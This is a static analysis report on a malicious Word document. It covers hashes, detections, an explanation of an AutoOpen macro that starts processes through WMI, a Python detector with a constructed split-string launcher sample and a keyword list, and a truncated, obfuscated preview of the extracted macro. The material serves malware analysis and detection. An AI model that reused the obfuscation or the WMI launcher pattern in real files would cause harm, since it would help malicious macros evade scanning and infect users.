Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bed222f3898beaa9…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 183.4 KB
Created: 2019-04-12 19:51:00
Authoring application: Microsoft Office Word
First seen: 2020-04-06
MD5: addba27d56abec9080e0d8b18ce3c616
SHA-1: 7fde8838940a3375812fe3b67d39940e45671dde
SHA-256: bed222f3898beaa942aae55cf61fb207abf4f7d6953b26a26f4a8d69c2fd04fc
Risk score: 342

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32

The sample contains a VBA project with an `autoopen` subroutine, so the macro runs as soon as the document is opened with macros enabled. The macro is heavily obfuscated (random identifiers, junk arithmetic and opaque conditionals, as visible in the extracted source below) and uses GetObject and CreateObject to obtain the Win32_Process WMI class, whose Create method starts a new process. This indicates an intent to execute arbitrary code, likely to download and run a second-stage payload. The WMI call chain `GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create` is the strong indicator here. Note that a WMI moniker is resolved with GetObject, not CreateObject (CreateObject takes a ProgID), and that the moniker and class name are typically assembled from short split string literals so that neither ever appears as a single searchable string.

Heuristics (9)

  • ClamAV: Doc.Malware.Sagent-6941569-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Sagent-6941569-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings)
    Document contains VBA macro code.
  • VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE)
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION)
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    Document contains an AutoOpen macro, which Word runs automatically when the document is opened with macros enabled.
  • GetObject call (high, OLE_VBA_GETOBJ)
    Macro calls GetObject, the VBA function that resolves monikers such as winmgmts: WMI paths.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Generic rule text; for this sample a VBA project was in fact recovered, see Extracted artifacts below.)
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the OOXML DrawingML namespace URI that ordinary Office markup references, not a payload location.
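The detection logic behind the WMI-launcher, GetObject, AutoOpen and split-keyword heuristics above, as an added Python example that is not part of this report or of the scanner that produced it. It joins VBA line continuations, folds chains of `&`/`+`-joined string literals back into the single literal they build, then checks whether a dangerous name (winmgmts, Win32_Process, WScript.Shell, ...) is present after folding but absent from every original literal, and whether a winmgmts moniker naming Win32_Process is paired with a `.Create` call. The macro it scans is a constructed sample in the style the heuristics describe, not the extracted macros.bas; the rule identifiers reuse the report's names only for readability.

```python
import re
from typing import Dict, List

# Constructed sample macro (not the macros.bas from this report): it mimics the
# split-literal WMI launcher that OLE_VBA_WMI_PROCESS_CREATE and
# OLE_VBA_SPLIT_KEYWORD_OBFUSCATION describe, including a VBA line continuation.
SAMPLE_VBA = r'''
Sub autoopen()
    On Error Resume Next
    Dim m As String
    m = "winm" & "gmts:" & "\\.\root\cim" _
        & "v2:Win32_" & "Process"
    Set p = GetObject(m)
    p.Create cmd, Null, Null, pid
End Sub

Sub helper()
    Dim s As String
    s = "WScr" + "ipt.Sh" + "ell"
    Set o = CreateObject(s)
End Sub
'''

# One VBA string literal; "" inside a literal is an escaped quote.
STR_RE = re.compile(r'"(?:[^"\n]|"")*"')
# Two or more literals joined by & or + on one (continuation-joined) line.
CHAIN_RE = re.compile(STR_RE.pattern + r'(?:\s*[&+]\s*' + STR_RE.pattern + r')+')
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+'
    r'(AutoOpen|Auto_Open|AutoExec|Document_Open|Workbook_Open)\b',
    re.IGNORECASE | re.MULTILINE)
# Names that are only ever split across literals to dodge keyword scanning.
KEYWORDS = ("winmgmts", "Win32_Process", "WScript.Shell", "Shell.Application",
            "Scripting.FileSystemObject", "powershell", "URLDownloadToFile")


def join_continuations(src: str) -> str:
    """Merge VBA ' _' line continuations so a chain split over lines is one line."""
    return re.sub(r'[ \t]+_[ \t]*\r?\n[ \t]*', ' ', src)


def fold_string_concats(src: str) -> str:
    """Replace every chain of &/+-joined literals with the single literal it builds."""
    def _join(m):
        parts = [lit[1:-1].replace('""', '"') for lit in STR_RE.findall(m.group(0))]
        return '"' + ''.join(parts).replace('"', '""') + '"'
    return CHAIN_RE.sub(_join, join_continuations(src))


def split_keywords(src: str) -> List[str]:
    """Dangerous names present after folding but absent from every original literal."""
    original = [lit.lower() for lit in STR_RE.findall(join_continuations(src))]
    folded = fold_string_concats(src).lower()
    return [k for k in KEYWORDS
            if k.lower() in folded and not any(k.lower() in lit for lit in original)]


def scan_vba(src: str) -> Dict[str, List[str]]:
    """Run the four rules and return {rule_id: [evidence, ...]} for those that fire."""
    findings: Dict[str, List[str]] = {}
    folded = fold_string_concats(src)
    low = folded.lower()
    m = AUTOEXEC_RE.search(folded)
    if m:
        findings["OLE_VBA_AUTOOPEN"] = [m.group(1)]
    getobj = re.findall(r'\bGetObject\s*\(', folded, re.IGNORECASE)
    if getobj:
        findings["OLE_VBA_GETOBJ"] = getobj
    # The launcher chain: a winmgmts moniker, the Win32_Process class, and .Create.
    moniker = re.search(r'"[^"\n]*winmgmts[^"\n]*"', folded, re.IGNORECASE)
    if moniker and "win32_process" in low and re.search(r'\.Create\b', folded, re.IGNORECASE):
        findings["OLE_VBA_WMI_PROCESS_CREATE"] = [moniker.group(0)]
    reassembled = split_keywords(src)
    if reassembled:
        findings["OLE_VBA_SPLIT_KEYWORD_OBFUSCATION"] = reassembled
    return findings


if __name__ == "__main__":
    for rule, evidence in scan_vba(SAMPLE_VBA).items():
        print(f"{rule}: {evidence}")
```

Folding only recovers names assembled from plain literals. Macros that build the string with Chr(), StrReverse(), Replace() or a helper function that decodes a byte array need those calls emulated as well, and a p-code-only document (the case OLE_VBA_PCODE_AUTOEXEC_EXEC targets) has no source to fold at all, so a p-code disassembler such as pcodedmp has to supply the tokens instead.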

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 35180 bytes
SHA-256: fceed5a4aaa43589a9ea8b0bbc3b44da9c2356c195051456b613f3cd92adaded

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "fDxGXAA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "z_B1ABD"
Attribute VB_Base = "0{5F0DFD43-34CA-4786-926B-7E4F474D276F}{56B85D28-FC4C-464B-94D5-4CE52043D02B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "MADBoBoA"
Attribute VB_Base = "0{91FB0125-B629-4599-936E-C4CE710EEBE0}{016AE71B-96B8-4C2B-A11D-CDAC1615E706}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "pUBCxC"
Sub autoopen()
   If kAZAQQ = DADAA1BB Then
 MAAAAA = wAAZBA - OAAwDGAZ
      Select Case boBcD_
         Case 280192566
            I_oBA11 = CVar(802557533 * Rnd(coAAZx * Round(909399502) / 680125650 * CLng(425639914 * Sqr(KAA1XcU))))
            WwUB_1 = Round(HCDoXU)
         Case 831352818
            EACAABD = IABB1oAG
            ZXDXAA = Atn(536232444)
      End Select
End If
   If sQA_ADAD = mGDxUAZo Then
 kwU1BU = DBD4A1 - cZDA1Z
      Select Case BcACDZDX
         Case 585545420
            hkDA_Q = CVar(947076902 * Rnd(rk4DZ1 * Round(176817655) / 19671795 * CLng(794910960 * Sqr(KCZABD4w))))
            uAQABcX = Round(KAXAAAU)
         Case 571860622
            RDUwBAG4 = UAAQBCDB
            QcAAADx = Atn(35064767)
      End Select
End If
aUAA_UC
   If wAZACDA = OAxCZX1Q Then
 OoAUBC_ = Wk1XA_G - UAUUUA
      Select Case fkCQ41B
         Case 354236406
            j4AcZAUA = CVar(814867957 * Rnd(i_AAxUA * Round(138509867) / 898730787 * CLng(175663181 * Sqr(BADDQAA))))
            zAAwDAAA = Round(zXxxAk)
         Case 437275709
            HwBQkDAA = h4xAUAA
            iCcAAA = Atn(534306769)
      End Select
End If
   If wBocACAX = TAB_AAA Then
 PADAQUAQ = FAxAXD - RkAwBBx
      Select Case hUQBZAG
         Case 114861285
            ZDBZXcAB = CVar(123467529 * Rnd(UkAAUX * Round(715869169) / 82923710 * CLng(390295200 * Sqr(EAkAU_4))))
            KU_DAQ4 = Round(zcokUA)
         Case 599972638
            pACxAD = iUkAAc
            vGAw4CBU = Atn(844187480)
      End Select
End If
End Sub

Attribute VB_Name = "wQBAADQ"
Function aUAA_UC()
On Error Resume Next
   If TAACcQc = BXAUowB Then
 tADwc4 = sG__c1Ak - NZAxAo
      Select Case L4QocA
         Case 75347560
            b1AGGc = CVar(200960725 * Rnd(nkAAAB * Round(189600513) / 211093100 * CLng(321090088 * Sqr(r1wAUD))))
            wGBDAA = Round(dA4QCD1k)
         Case 348122217
            PcGQ1A = LDUc1Ac
            wQxoAAA = Atn(873012742)
      End Select
End If
   If JQXQxZ = IAxBZoAX Then
 FUQUBA1Z = AXDAUo - zDCUDAD
      Select Case lDQUAAUU
         Case 918578058
            KkAQw1Ac = CVar(173295352 * Rnd(hA_X_BU * Round(45651812) / 636582741 * CLng(46408860 * Sqr(cAZABo))))
            ZwUUoDU = Round(FUAA1A)
         Case 349933414
            rQcoxAQQ = lZCD_A
            mA1UABx = Atn(526896309)
      End Select
End If
   If NAQcAX = pABABUA Then
 nD1AAZ = PXcXAw - AAAXoQGC
      Select Case nA1GDADA
         Case 877355486
            OCADoAcC = CVar(248700971 * Rnd(LxBkBB * Round(137761081) / 978677350 * CLng(679138766 * Sqr(fUXAAD))))
            RAZDUA = Round(A_UcXA)
         Case 549878653
            FC1QQA = AAAoAU
            HwoUAB = Atn(807538438)
      End Select
End If
If 9044 < 15165 Then
tUoUAwQ_ = 0
   If skwBAQAA = qxC_AA Then
 aAx4D1AA = CCQUUwAU - UQAoAxD
      Select Case r1DoxU
         Case 746646378
            CAGDwG = CVar(873329916 * Rnd(FAUkQUB * Round(587131089) / 739187409 * CLng(497693669 * Sqr(DwoB__CD))))
            hADAAB = Round(ExA4cUZ
... (truncated)